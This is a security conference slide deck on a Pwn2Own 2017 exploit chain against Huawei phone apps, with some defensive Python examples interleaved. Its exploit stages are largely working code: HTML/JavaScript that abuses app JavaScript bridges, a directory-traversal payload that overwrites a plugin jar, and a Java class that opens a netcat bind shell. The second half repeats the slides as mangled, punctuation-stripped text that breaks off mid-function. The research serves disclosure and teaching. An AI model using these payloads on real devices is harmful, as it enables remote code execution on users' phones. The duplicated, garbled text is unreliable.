Android Pwn2Owning
Hacktivity 2018
PUBLIC
Introduction

Agenda
• Background
• Bug Hunting Approach
• Tooling and Automation
• Mobile Pwn2Own 2017 Vulnerabilities
• Demo

About us
• James Loureiro (@NerdKernel) – Head of Security Research, MWR. Primarily focused on VR and reverse engineering (as well as herding other researchers)
• Alex Plaskett (@alexjplaskett) – Offensive security researcher, MWR. Primarily doing VR (WP7 jailbreak, Pwn2Own Safari 2018, mobile security)

Background
• How hard can it be?
PWN2OWN 2017

Huawei Mate 9 Pro

PWN2OWN
Execute arbitrary instructions…
…retrieve sensitive information…
…a full sandbox escape is required…
…without any user interaction

Pwn2Own Categories and Choice

PWN2OWN – Results

Bug Hunting Approach

Browser attack surface
Exploit Mitigation Advancement
• Memory Safety Mitigations
  – ASLR, PIE, RELRO, PartitionAlloc
• Means you need mitigation bypass vulnerabilities too
• Time consuming debugging memory corruption exploits on a real device

Attackers - Positives of Logic Bug Chains
• Often design issues
  – Hard to fix (long bug lives)
  – Increased reliability
• Architecture agnostic
  – No problems with shellcode
• Android IPC specifically is complex as hell
• Harder to detect
Attackers - Negatives of Logic Bug Chains
• They can get ridiculously long (11 bugs in S8)
  – One bug gets fixed and the whole chain is screwed
  – Usually not particularly stealthy
    • Samsung phone rebooted
    • Huawei phone switches apps twice
• Often requires a deeper understanding of the application
• Automated detection is harder – how do you fuzz for logic bugs?
Bug Hunting Tips
• How to prioritise?
  – External Attack Surface (reachable from browser)
  – Permissions
    • Less of an issue for initial foothold
  – Dangerous words
• Want to rapidly find high risk issues in a large amount of apps
Tooling and Automation

Toolset (Static vs Dynamic)
• Android: what do we care about?
  – BROWSABLE intents (need to be web accessible) and Intents
  – Content we can load into the applications (either via a WebView or Media)
  – Controlled file writes / reads
  – Unsafe class loading

Increasing the attack surface
How do we get more things accessible?
• Intent Proxy Bugs
• MITM stuff (SSL weaknesses)
Intent Proxy Example
• Android Vending
• LaunchUrlHandlerActivity
• We control the package name and URI

final Intent a(Intent arg17, b arg18, j arg19) {
    Intent v2_1;
    Uri v7 = arg17.getData();                    // data URI of the incoming, browser-reachable intent
    String v8 = v7.getQueryParameter("url");     // target URL taken from the query string
    String v10 = v7.getQueryParameter("id");     // target package name taken from the query string
    …
    if((v5) && (v12)) {
        v2_1 = new Intent("android.intent.action.VIEW");
        v2_1.setData(Uri.parse(v8));
        v2_1.setPackage(v10);                    // the VIEW intent is forwarded to whatever package was named
        return v2_1;
    }
    …
}
Toolset (Static Analysis)
• Rezord (internal) – Mass de-compilation of all apps
• JEB
• Grep

'Jandroid' – Static analysis
• For more info see the Chainspotting: Building Exploit Chains with Logic Bugs slides:
  https://infiltratecon.com/archives/[Infiltrate]%20Geshev%20and%20Miller%20-%20Logic%20Bug%20Hunting%20in%20Chrome%20on%20Android.pdf

Dynamic Analysis Toolset
(comparison table; columns: Global Hook, Flexible, Requires Root, Lightweight; rows: Xposed, Frida)
• Xposed
  – Early injection (Zygote)
  – Global hooks across multiple applications
• Frida
  – Quick and easy prototyping
  – Debugging and dynamic analysis of obfuscated code
Vulnerabilities

Building an Exploit Chain
• So what do we need to do?
• Assuming no memory corruption
• BROWSABLE Intent / URI handler etc.

(chain diagram) Browse to Website on Device → Code Exec and Profit

HiApp – Huawei Market Place (App Gallery)

HiApp – Whitelist Bypass (CVE-2018-7931)
<activity android:configChanges="orientation|screenSize"
    android:launchMode="singleTop"
    android:name="com.huawei.appmarket.service.externalapi.view.ThirdApiActivity"
    android:theme="@style/loading_activity_style">
    <intent-filter>
        <action android:name="android.intent.action.VIEW" />
        <category android:name="android.intent.category.DEFAULT" />
        <category android:name="android.intent.category.BROWSABLE" />
        <data android:host="details" android:scheme="appmarket" />
        <data android:host="search" android:scheme="market" />
        <data android:host="a.vmall.com" android:scheme="https" />
        <data android:host="com.huawei.appmarket" android:scheme="hiapp" />
    </intent-filter>
</activity>
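An added example, not code from the slides or from HiApp, for the "BROWSABLE intents" item in the static-analysis checklist above: a small manifest triage that lists every activity a web page can reach and the scheme/host pairs it accepts. The sample manifest is constructed from the ThirdApiActivity declaration on this slide plus one made-up non-browsable activity that the triage must ignore.

```python
# Added example, not code from the slides or from HiApp: list the activities an
# AndroidManifest.xml exposes to web content (intent-filters carrying the
# BROWSABLE category), with the scheme/host pairs each one accepts.
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"


def _attr(elem, name):
    """Read an android:-namespaced attribute, or None if absent."""
    return elem.get("{%s}%s" % (ANDROID_NS, name))


def browsable_entry_points(manifest_xml):
    """Return one dict per <activity> that has a BROWSABLE intent-filter."""
    root = ET.fromstring(manifest_xml)
    found = []
    for activity in root.iter("activity"):
        for flt in activity.findall("intent-filter"):
            categories = {_attr(c, "name") for c in flt.findall("category")}
            if "android.intent.category.BROWSABLE" not in categories:
                continue
            found.append({
                "activity": _attr(activity, "name"),
                # An intent-filter implies exported=true unless the manifest says otherwise.
                "exported": _attr(activity, "exported") != "false",
                "actions": [_attr(a, "name") for a in flt.findall("action")],
                "uris": [(_attr(d, "scheme"), _attr(d, "host")) for d in flt.findall("data")],
            })
    return found


# Constructed sample manifest: the ThirdApiActivity filter from the slide plus
# a made-up, non-browsable activity that the triage must ignore.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.huawei.appmarket">
  <application>
    <activity android:name="com.huawei.appmarket.service.externalapi.view.ThirdApiActivity"
        android:launchMode="singleTop">
      <intent-filter>
        <action android:name="android.intent.action.VIEW" />
        <category android:name="android.intent.category.DEFAULT" />
        <category android:name="android.intent.category.BROWSABLE" />
        <data android:host="details" android:scheme="appmarket" />
        <data android:host="search" android:scheme="market" />
        <data android:host="a.vmall.com" android:scheme="https" />
        <data android:host="com.huawei.appmarket" android:scheme="hiapp" />
      </intent-filter>
    </activity>
    <activity android:name="com.huawei.appmarket.ExampleInternalActivity" android:exported="false">
      <intent-filter>
        <action android:name="android.intent.action.VIEW" />
        <category android:name="android.intent.category.DEFAULT" />
      </intent-filter>
    </activity>
  </application>
</manifest>"""

if __name__ == "__main__":
    for entry in browsable_entry_points(SAMPLE_MANIFEST):
        print(entry["activity"], "exported" if entry["exported"] else "not exported")
        for scheme, host in entry["uris"]:
            print("  %s://%s" % (scheme, host))
```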
HiApp – Whitelist Bypass (CVE-2018-7931)
public List b() {
    if(b.a(this.a)) {
        this.a = new ArrayList();
        this.a.clear();
        // allowlist entries: each pattern is anchored only at its end ('$')
        this.a.add("hicloud.com$");
        this.a.add("vmall.com$");
        this.a.add("huawei.com$");
        Iterator v1 = com.huawei.appmarket.service.whitelist.b.a().iterator();
        do {
            if(v1.hasNext()) {
                if(v1.next().booleanValue()) continue;
                …
HiApp – stage1.html (CVE-2018-7931)
document.location = 'hiapp://com.huawei.appmarket?activityName=activityUri|webview.activity&params={"params":[{"name":"uri","type":"String","value":"internal_webview"},{"name":"url","type":"String","value":"http://www.vmall.com:8000/stage2.html"}]}&channelId=1';
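An added example, not HiApp's code: the allowlist entries from the slide applied the loose way (end-anchored regexes searched in the host) next to a strict check (https only, exact host or dot-bounded subdomain), run on the stage1 URL above and on a look-alike host. How the real app applied its patterns is not on the slide; the loose form is one plausible reading, used here to show what end-only anchoring and a missing scheme check let through.

```python
# Added example, not HiApp's code: a loose allowlist check modelled on the
# slide's entries beside a strict one. Assumption: the entries are regexes
# searched in the URL host; the slide does not show how they were applied.
import re
from urllib.parse import urlsplit

# Entries as on the slide, punctuation restored: no '^' at the start.
LOOSE_PATTERNS = ["hicloud.com$", "vmall.com$", "huawei.com$"]
ALLOWED_DOMAINS = ["hicloud.com", "vmall.com", "huawei.com"]


def loose_allowed(url):
    """Accept if any pattern matches somewhere in the host (end-anchored only).

    Any host that merely ends in an allowed name passes, and a plain http URL
    is treated the same as https.
    """
    host = urlsplit(url).hostname or ""
    return any(re.search(p, host) for p in LOOSE_PATTERNS)


def strict_allowed(url):
    """Accept only https URLs whose host is an allowed domain or a subdomain of one."""
    parts = urlsplit(url)
    if parts.scheme != "https":  # plain http can be rewritten by anyone on the network path
        return False
    host = (parts.hostname or "").lower()
    return any(host == d or host.endswith("." + d) for d in ALLOWED_DOMAINS)


if __name__ == "__main__":
    # Constructed inputs: the stage1 URL from the slide plus look-alike hosts.
    for url in ["http://www.vmall.com:8000/stage2.html",
                "https://a.vmall.com/",
                "https://notvmall.com/"]:
        print("%-40s loose=%-5s strict=%s" % (url, loose_allowed(url), strict_allowed(url)))
```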
Stage 1
(chain diagram) Browse to Website on Device → BROWSABLE Intent → WebView → Code Exec and Profit
HiApp – JavaScript Bridge (CVE-2018-7932)
this.webview.getSettings().setJavaScriptEnabled(true);
this.webview.requestFocus();
this.webview.setWebViewClient(new InternalWebViewClient(this));
this.webview.setWebChromeClient(new MarketWebChromeClient(this));
this.webview.getSettings().setBlockNetworkImage(true);
// HiSpaceObject becomes callable from any page loaded in this WebView
this.webview.addJavascriptInterface(new HiSpaceObject(this.mContext, ((JsCallBackOjbect)this), this.webview), "HiSpaceObject");

HiApp – JavaScript Bridge (CVE-2018-7932)
@JavascriptInterface
public void launchApp(String arg7, String arg8) {
    URISyntaxException v1_1;
    v0_1 = Intent.parseUri(arg8, 0);          // arg8: intent URI supplied by page JavaScript
    try {
        v0_1.setPackage(arg7);                // arg7: target package supplied by page JavaScript
        this.mActivity.startActivity(v0_1);   // starts the activity named in the URI, no check on either argument
        …
android-app URI Schema
http://androidxref.com/8.0.0_r4/xref/frameworks/base/core/java/android/content/Intent.java

android-app://{package_id}[/{scheme}[/{host}[/{path}]]][#Intent;...;end]

android-app://com.example.app/#Intent;action=com.example.MY_ACTION;i.some_int=100;S.some_str=hello;end
Action: com.example.MY_ACTION
Package: com.example.app
Extras: some_int=(int)100, some_str=(String)hello
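An added example, not from the slides or from Android itself: a parser for the android-app://...#Intent;...;end form described above, following the field syntax documented in Intent.java for the fields this page uses (action=, package=, component=, and typed extras such as i.name= and S.name=). It is a teaching model of the format, not a copy of Intent.parseUri(); fields it does not know are rejected rather than guessed.

```python
# Added example, not from the slides or from Android: a parser for the
# android-app://...#Intent;...;end form. Models the documented field syntax
# for the fields used on this page; it is not Intent.parseUri().
from urllib.parse import unquote, urlsplit

# Type prefix -> converter for typed extras ("i.some_int=100", "S.some_str=hello").
EXTRA_TYPES = {
    "S": str,                                   # S.name=  String
    "B": lambda v: v.lower() == "true",         # B.name=  boolean
    "i": int,                                   # i.name=  int
    "l": int,                                   # l.name=  long
    "f": float,                                 # f.name=  float
    "d": float,                                 # d.name=  double
}


def parse_android_app_uri(uri):
    """Split an android-app URI into package, action, component and typed extras."""
    if not uri.startswith("android-app://"):
        raise ValueError("not an android-app URI")
    head, hash_sign, fragment = uri.partition("#")
    # The authority before the fragment is the package_id from the schema line.
    result = {"package": urlsplit(head).netloc, "action": None,
              "component": None, "extras": {}}
    if not hash_sign:
        return result  # no Intent fragment: a plain VIEW of the data URI
    if not (fragment.startswith("Intent;") and fragment.endswith(";end")):
        raise ValueError("fragment must be Intent;...;end")
    body = fragment[len("Intent;"):-len(";end")]
    for field in filter(None, body.split(";")):
        key, eq, value = field.partition("=")
        if not eq:
            raise ValueError("field without '=': %r" % field)
        value = unquote(value)
        if key in ("action", "package", "component"):
            result[key] = value
        elif len(key) > 2 and key[1] == "." and key[0] in EXTRA_TYPES:
            result["extras"][key[2:]] = EXTRA_TYPES[key[0]](value)
        else:
            # Anything else, including an untyped key, is outside the documented syntax.
            raise ValueError("unsupported field %r" % key)
    return result


if __name__ == "__main__":
    # The example URI from the slide above.
    print(parse_android_app_uri(
        "android-app://com.example.app/#Intent;action=com.example.MY_ACTION;"
        "i.some_int=100;S.some_str=hello;end"))
```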
HiApp – stage2.html (CVE-2018-7932)
var pkg = "com.huawei.hwireader";
var uri = "android-app://http://www.google.co.uk/#Intent;component=com.huawei.hwireader/com.zhangyue.iReader.online.ui.ActivityWeb;action=com.huawei.hwireader.SHOW_DETAILS;url=http://192.168.137.1:8000/stage3.html;end";
window.HiSpaceObject.launchApp(pkg, uri);

Stage 2
(chain diagram) Browse to Website on Device → BROWSABLE Intent → WebView → Exported Intent → WebView → Code Exec and Profit
Huawei Reader Application

Huawei Reader – Input Validation (CVE-2017-15308)
protected void onCreate(Bundle arg8) {
    CharSequence v0_1;
    String v0;
    CharSequence v1 = null;
    super.onCreate(arg8);
    Intent v2 = this.getIntent();
    if(v2 != null) {
        Uri v3 = v2.getData();
        if(v3 != null) {
            v0 = v3.getScheme();
            …
        }
        else {
            v0_1 = v1;
        }
        v0 = v2.getStringExtra("url");                // URL taken straight from the incoming intent
        if(TextUtils.isEmpty(((CharSequence)v0))) {
            goto label_51;
        }
        this.loadRefreshUrl(v0);                      // loaded into the WebView without validation
        …
Huawei Reader – Input Validation (CVE-2017-15308)
@JavascriptInterface
public void do_command(String arg9) {
    …
    String v4 = ((JSONObject)v2_3).getString("Action");      // command name chosen by page JavaScript
    LOG.I("js actionName" + v4);
    JSONObject v5 = ((JSONObject)v2_3).getJSONObject("Data"); // command arguments, also page-controlled
    if(v4.equalsIgnoreCase("onlineReader")) {
        JSProtocol.mJSBookProtocol.online(v5);
        return;
    }
    if(v4.equalsIgnoreCase("readNow")) {
        JSProtocol.mJSBookProtocol.readNow(v5);
        return;
    }
    …
Huawei Reader – Arbitrary Write / Directory Traversal (CVE-2017-15309)
public void originalDownload(JSONObject arg19, boolean arg20, boolean arg21) {
    …
    v8 = 0;
    v10 = v4;
    v4_1 = 0;
    try {
        int v13 = v7.getInt("Type");
        v14 = v7.optInt("Version");
        v15 = v7.optBoolean("getDrmAuth", true);
        v3 = PATH.getBookDir() + v7.getString("FileName");   // FileName is concatenated unchecked, so "../" leaves the book directory
        v2 = v7.getInt("FileId");
        v6 = v7.getString("DownloadUrl");                    // the file written to v3 is fetched from this page-supplied URL
        …
Huawei Reader – Arbitrary Write / Directory Traversal (CVE-2017-15309)
function download_plugin() {
    var json = '{"Action":"onlineReader","Data":{"Charging":{"FeeType":0,"OrderUrl":"http://192.168.137.1:8001/aaaaa","Price":0},' +
        '"DownloadInfo":{"ChapterId":1,"FeeUnit":10,"Type":1,"FileId":32532639,"FileName":"../plugins/DFService/classes.jar",' +
        '"FileSize":10000000,"Ebk3DownloadUrl":"https://s3-ap-northeast-1.amazonaws.com/4aaaaaa9q84q87reertw35wy5/test.zip",' +
        '"DownloadUrl":"https://s3-ap-northeast-1.amazonaws.com/k4aaaaaaertw35wy5/test.zip","Version":2}}}';
    window.ZhangYueJS.do_command(json);
}

Stage 3
(chain diagram) Browse to Website on Device → BROWSABLE Intent → WebView → Exported Intent → WebView → File Write → Code Exec and Profit
Huawei Reader – Arbitrary Delete (CVE-2017-15310)
public boolean onChapPack(JSONObject arg10) {
    boolean v0_2;
    try {
        int v3 = arg10.getInt("StartIndex");
        int v4 = arg10.getInt("EndIndex");
        String v2 = arg10.getString("Price");
        int v1 = arg10.getInt("BookId");
        String v5 = arg10.getString("PayURL");
        String v0_1 = arg10.getString("DownloadURL");
        String v7 = PATH.getBookDir() + arg10.getString("FileName");   // same unchecked concatenation as originalDownload
        // deletes only when the "open failed" marker for this path exists and the device is online
        if((FILE.isExist(PATH.getBookNameCheckOpenFail(v7))) && Device.getNetType() != 0xFFFFFFFF) {
            FILE.delete(PATH.getBookCachePathNamePostfix(v7));
            FILE.delete(v7);                                             // path is page-controlled: arbitrary delete
        }
        …
Huawei Reader – Arbitrary Delete (CVE-2017-15310)
public static String getBookNameCheckOpenFail(String arg2) {
    return PATH.getOpenFailDir() + MD5.getMD5(arg2);
}
public static String getOpenFailDir() {
    return PATH.getWorkDir() + "books/openfail/";
}

Huawei Reader – Arbitrary Delete (CVE-2017-15310)
MD5 marker name for ../plugins/DFService/classes.jar: 5457bea93d0548a4d84357308df45322
/sdcard/HWiReader/books/openfail/5457bea93d0548a4d84357308df45322
/sdcard/HWiReader/books/../plugins/DFService/classes.jar
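An added example, not the Reader app's code, serving both the originalDownload write (CVE-2017-15309) and the onChapPack delete (CVE-2017-15310) above, which build their target path the same way: the unchecked concatenation beside a containment check that canonicalises the result and refuses anything outside the book directory, plus the openfail marker derivation that ties the two bugs together. Assumptions: paths are handled lexically with posixpath so it runs without an Android file system, and MD5.getMD5 is taken to be the hex MD5 of the path string.

```python
# Added example, not the Reader app's code: unsafe vs. contained path
# construction for the FileName field, and the openfail marker derivation.
# Assumptions: lexical paths (posixpath); MD5.getMD5 == hex MD5 of the string.
import hashlib
import posixpath

BOOK_DIR = "/sdcard/HWiReader/books/"            # book directory shown on the slide
OPENFAIL_DIR = BOOK_DIR + "openfail/"            # PATH.getOpenFailDir() on the slide


def unsafe_book_path(file_name):
    """What the decompiled code does: plain concatenation, '..' included."""
    return BOOK_DIR + file_name


def safe_book_path(file_name):
    """Canonical path for file_name inside BOOK_DIR, or None if it escapes.

    Lexical only: a real implementation should also resolve symlinks
    (os.path.realpath) before comparing, since external storage is writable
    by other apps.
    """
    if not file_name or file_name.startswith("/"):
        return None
    root = posixpath.normpath(BOOK_DIR)
    candidate = posixpath.normpath(posixpath.join(root, file_name))
    if not candidate.startswith(root + "/"):
        return None                              # '..' climbed out of the book directory
    return candidate


def openfail_marker(book_path):
    """Marker file whose presence lets onChapPack() delete book_path.

    Mirrors getBookNameCheckOpenFail(): openfail dir + MD5 of the full path.
    The marker lives under the same writable directory as the books, so the
    write primitive can create it for any path it wants the delete to accept.
    """
    digest = hashlib.md5(book_path.encode("utf-8")).hexdigest()
    return OPENFAIL_DIR + digest


if __name__ == "__main__":
    # Constructed inputs: the FileName from the slide and a benign one.
    for name in ["../plugins/DFService/classes.jar", "book1/chapter1.ebk3"]:
        raw = unsafe_book_path(name)
        print("FileName %-35s unsafe -> %s" % (name, posixpath.normpath(raw)))
        print("%-44s safe   -> %s" % ("", safe_book_path(name)))
        print("%-44s marker -> %s" % ("", openfail_marker(raw)))
```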
Huawei Reader – Insecure Plugin Loading
public static Class loadPlug(Context arg4, String arg5, String arg6) throws Exception {
    // arg5 is a jar path under external storage; nothing checks its origin or signature before it is loaded
    return new DexClassLoader(arg5, arg4.getApplicationInfo().dataDir, null, arg4.getClassLoader()).loadClass(arg6);
}

protected final ArrayList P() {
    if(pR == null) {
        try {
            PlatForm v3 = new PlatForm();
            Object v2 = Util.loadPlug(APP.getAppContext(), v3.getPlugDir("DFService") + "classes.jar",
                                      "com.zhangyue.iReader.PlugService.DocFeature").newInstance();   // runs the constructor of whatever class the jar holds
            v2.setPlatform(((IPlatform)v3));
            pR = ((IPlugDFService)v2);
            …
Huawei Reader – Insecure Plugin Loading
function download_plugin() {
    document.writeln("++ Downloading replacement classes.jar ++");
    // It should be noted that FileId needs to be unique for the download to work correctly
    var json = '{"Action":"onlineReader","Data":{"Charging":{"FeeType":0,"OrderUrl":"http://192.168.137.1:8001/aaaaa","Price":0},' +
        '"DownloadInfo":{"ChapterId":1,"FeeUnit":10,"Type":1,"FileId":' + PLUGIN_FILE_ID + ',"FileName":"../plugins/DFService/classes.jar",' +
        '"FileSize":10000000,"Ebk3DownloadUrl":"' + PLUGIN_URI + '","DownloadUrl":"' + PLUGIN_URI + '","Version":2}}}';
    window.ZhangYueJS.do_command(json);
}
Huawei Reader – Payload Creation
package com.zhangyue.iReader.PlugService;

import android.util.Log;
import java.io.IOException;

// Replacement for the plugin class named in loadPlug(); its constructor runs as soon as the jar is loaded
public class DocFeature {
    public DocFeature() {
        Log.e("ATTACKER", "RUNNING ARBITRARY CODE");
        String cmd = "/data/data/com.huawei.hwireader/busybox nc -l -p 5555 -e /data/data/com.huawei.hwireader/busybox sh";
        try {
            Runtime.getRuntime().exec(cmd);
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}
Demo

Questions?

Credits
• Georgi Geshev, Rob Miller - https://labs.mwrinfosecurity.com/publications/logic-bug-hunting-in-chrome-on-android/new-blog-post

Whitepaper
• Full whitepaper can be found on the MWR Labs website (https://labs.mwrinfosecurity.com/publications/nhuawew-blog-post)
PUBLIC
PUBLIC
Introduction
Agenda
bull Background
bull Bug Hunting Approach
bull Tooling Automation
bull Mobile Pwn2Own 2017 Vulnerabilities
bull Demo
2
About us
bull James Loureiro (NerdKernel) ndash Head of Security Research MWR primarily
focused on VR and reverse engineering (as well as herding other researchers)
bull Alex Plaskett (alexjplaskett) ndash Offensive security researcher MWR
primarily doing VR (WP7 jailbreak Pwn2Own Safari 2018 mobile security)
3
Background
bull How hard can it be
4
PWN2OWN 2017
5
Huawei Mate 9 Pro
6
PWN2OWN
Execute arbitrary instructionshellip
hellipretrieve sensitive informationhellip
hellipa full sandbox escape is requiredhellip
hellipwithout any user interaction
8
Pwn2Own Categories and Choice
9
PWN2OWN ndash Results
10
PUBLIC
Bug Hunting Approach
Browser attack surface
12
Exploit Mitigation Advancement
bull Memory Safety Mitigations
ndash ASLR PIE RELTO PartitionAlloc
bull Means you need mitigation bypass vulnerabilities too
bull Time consuming debugging memory corruption exploits on a real device
13
Attackers - Positives of Logic Bug Chains
bull Often design issues
ndash Hard to fix (long bug lives)
ndash Increased reliability
bull Architectural agnostic
ndash No problems with shellcode
bull Android IPC specifically is complex as hell
bull Harder to detect
14
Attackers - Negatives of Logic Bug Chains
bull They can get ridiculously long (11 Bugs in S8)
ndash One bug gets fixed and the whole chain is screwed
ndash Usually not particularly stealthy
Samsung phone rebooted
Huawei phone switches apps twice
bull Often requires a deeper understanding of the application
bull Automated detection is harder ndash how do you fuzz for logic bugs
15
Bug Hunting Tips
bull How too prioritise
ndash External Attack Surface (Reachable from browser)
ndash Permissions
Less of an issue for initial foothold
ndash Dangerous words
16
bull Want to rapidly find high risk issues in a large amount of apps
PUBLIC
Tooling and Automation
Toolset (Static vs Dynamic)
bull Android What do we care about
ndash BROWSABLE intents (Need to be web accessible) and Intents
ndash Content we can load into the applications (either via a WebView or Media)
ndash Controlled file writes reads
ndash Unsafe class loading
18
Increasing the attack surface
How do we get more things accessible
bull Intent Proxy Bugs
bull MITM stuff (SSL weaknesses)
19
Intent Proxy Example
bull Android Vendingbull LaunchUrlHandlerActivity
bull We control the package name and URIfinal Intent a(Intent arg17 b arg18 j arg19)
Intent v2_1Uri v7 = arg17getData()String v8 = v7getQueryParameter(url)String v10 = v7getQueryParameter(id)
hellipif((v5) ampamp (v12))
v2_1 = new Intent(androidintentactionVIEW)v2_1setData(Uriparse(v8))v2_1setPackage(v10)return v2_1
hellip
Toolset (Static Analysis)
bull Rezord (internal) ndash Mass de-compilation of all apps
bull JEB
bull Grep
21
lsquoJandroidrsquo ndash Static analysis
22
lsquoJandroidrsquo ndash Static analysis
23
lsquoJandroidrsquo ndash Static analysis
bull For more info see Chainspotting Building Exploit Chains with Logic Bugs
slides
httpsinfiltrateconcomarchives[Infiltrate]20Geshev20and20Miller20
-20Logic20Bug20Hunting20in20Chrome20on20Androidpdf
24
Dynamic Analysis Toolset
Global Hook Flexible Requires Root Lightweight
Xposed
Frida
bull Xposedbull Early injection (Zygote)
bull Global hooks across multiple applications
bull Fridabull Quick and easy prototyping
bull Debugging and dynamic analysis of obfuscated code
PUBLIC
Vulnerabilities
Building an Exploit Chain
bull So what do we need to dobull Assuming no memory corruption
bull BROWSABLE Intent URI handler etc
Browse to Website on
Device
Code Exec and Profit
HiApp ndash Huawei Market Place (App Gallery)
29
HiApp ndash Whitelist Bypass (CVE-2018-7931)
30
ltactivity androidconfigChanges=orientation|screenSize
androidlaunchMode=singleTopldquo
androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi
vity androidtheme=styleloading_activity_stylegt
ltintent-filtergt
ltaction androidname=androidintentactionVIEW gt
ltcategory androidname=androidintentcategoryDEFAULT gt
ltcategory androidname=androidintentcategoryBROWSABLE gt
ltdata androidhost=details androidscheme=appmarket gt
ltdata androidhost=search androidscheme=market gt
ltdata androidhost=avmallcom androidscheme=https gt
ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt
HiApp ndash Whitelist Bypass (CVE-2018-7931)
31
public List b()
if(ba(thisa))
thisa = new ArrayList()
thisaclear()
thisaadd(hicloudcom$)
thisaadd(vmallcom$)
thisaadd(huaweicom$)
Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()
do If(v1hasNext()) if(v1next()booleanValue()) continue
HiApp ndash stage1html (CVE-2018-7931)
32
documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1
Stage 1
Browse to Website on
Device
BROWSABLE Intent-
WebView
Code Exec and Profit
HiApp ndash JavaScript Bridge (CVE-2018-7932)
34
thiswebviewgetSettings()setJavaScriptEnabled(true)
thiswebviewrequestFocus()
thiswebviewsetWebViewClient(new InternalWebViewClient(this))
thiswebviewsetWebChromeClient(new
MarketWebChromeClient(this))
thiswebviewgetSettings()setBlockNetworkImage(true)
thiswebviewaddJavascriptInterface(new
HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
